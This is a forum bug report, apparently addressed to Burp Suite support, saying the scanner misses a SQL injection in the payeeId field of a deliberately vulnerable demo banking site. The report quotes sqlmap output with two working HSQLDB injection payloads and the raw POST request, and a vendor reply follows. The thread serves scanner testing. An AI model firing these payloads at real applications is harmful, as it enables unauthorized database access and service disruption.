Missed SQL Injection
Doing some tests I notice that Burp ( version 2.1.04 ) is missing the SQL injection at http://zero.webappsecurity.com under post data field payeeId.
SQLmap will identify it with as the following:
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
Parameter: payeeId (POST)
Type: stacked queries
Title: HSQLDB >= 1.7.2 stacked queries (heavy query - comment)
Payload: payeeId=abc';CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(7251),0),500000000),NULL)--
Type: time-based blind
Title: HSQLDB > 2.0 OR time-based blind (heavy query)
Payload: payeeId=abc' OR CHAR(76)||CHAR(86)||CHAR(107)||CHAR(117)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)-- GsOo
[14:02:48] [INFO] the back-end DBMS is HSQLDB
The post request where Burl should have found the injection is
POST /bank/pay-bills-get-payee-details.html HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONID=29DB5859; username=username; password=password
The website is created for testing web scanner applications, please feel free to use it for that purpose.
We have this feature in this years roadmap. Once we release the updated version of the crawler we should find this issue with a crawl and audit.
If I can be of any further assistance, please let me know.